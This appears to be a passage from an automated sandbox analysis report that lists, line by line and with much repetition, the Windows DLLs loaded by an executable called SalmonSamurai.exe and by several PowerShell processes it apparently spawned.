Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: msmpeg2vdec.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mfperfhelper.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dxva2.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: msvproc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
